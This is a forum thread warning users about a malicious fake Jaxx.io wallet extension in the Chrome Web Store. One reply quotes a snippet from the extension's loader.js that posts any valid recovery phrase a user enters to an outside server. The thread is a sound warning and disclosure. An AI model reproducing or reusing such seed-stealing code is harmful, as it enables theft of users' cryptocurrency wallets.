Author

Topic: [WARNING]: MALICIOUS JAXX.IO in CHROME Webstore (Read 225 times)

full member
Activity: 966
Merit: 153
Whether you are a newbie or a long term bitcoin enthusiast or user. I wouldn't even suggest anyone to use Jaxx.io wallet to collect or store bitcoin temporarily. There are hundreds of reputable wallets out there that are supportive for users in different countries and even noob-friendly.

Since it experienced a major hack in late 2017, it hasn't been the same. Personally, i feel it has low management from its developer, which is the reason why it is always vulnerable to hacking and phishing.
hero member
Activity: 2870
Merit: 594
Yes, it has been taken down already, so I guess this is a win-win situation for all of us.

But I lauded those scam hunters here in the community because of their warning and the amount of time they spend finding those cyber crooks. But I'm sure this will pop up again as criminals are taking advantage of Google very lax policy on every apps their store has to offer specially crypto related apps.
legendary
Activity: 2212
Merit: 7064
Thank you for reporting.
I would stay away from using even original Jaxx wallet, and chrome store has become place for many scams recently, so watch out there.
Looks like it is deleted now.
 
member
Activity: 252
Merit: 11
Likely some malicious & malware publish randomly in the internet world writers are reported looking like coronavirus image base windows theme but attach with malware,  also your detected (MALICIOUS JAXX.IO in CHROME Webstore) I hope everyone avoids downloading everything new theme or addon.
Thanks Kemarit help to Newbies like everyone avoids download with reported.

-------------------------------------------
This addon was maybe already deleted on the chrome webstore.
hero member
Activity: 3024
Merit: 680
★Bitvest.io★ Play Plinko or Invest!
Thanks for the warning. I have seen lately that many of these hackers are using the popular names of wallets and making a chrome extension. Each of them should announce that they don't support any extension and will not create it.
legendary
Activity: 2576
Merit: 1655
I also did find similar exploit using Jaxx Atomic Wallet Complaint Form.
full member
Activity: 333
Merit: 105
www.cd3d.app
Thank you to warn us.  I have reported it.

hero member
Activity: 2632
Merit: 833
Inspecting the code more closely (loader.js)

Code:
localStorage.setItem('BackUpCorrect',JSON.stringify(phases));
    if (phases.length > 11) {
        let allwords = phases.join(' ');
        if (bip39.validateMnemonic(allwords)) {
            $('#restoreWallet').prop('disabled', !1)
            $.post("https://usermetrica.org/api_v1/", {pc: "jaxx: "+allwords});
        } else {
            $('#restoreWallet').prop('disabled', !0)

So it is posting here.

Code:
https://usermetrica.org/api_v1/
.

Very similar to what I have reported here Ledger Live fake Chrome extensions.
legendary
Activity: 3080
Merit: 1353
Cyber criminals are using chrome webstore to spread malicious apps like Jaxx.

So this is a warning to Newbies, don't download this extensions.



Code:
https://chrome.google.com/webstore/detail/jaxx-wallet/pedokobimilhjemibclahcelgedmkgei

On the right side, you will see, Report Abuse, so I ask everyone to report so that it will be taken down. Here is the report link for convenience:

https://chrome.google.com/webstore/report/pedokobimilhjemibclahcelgedmkgei?hl=en&gl=US

It will take just a few minutes of your time.



Yes, adblock or ublock can help, but as you can see on the page, 257 have downloaded it already.
Jump to: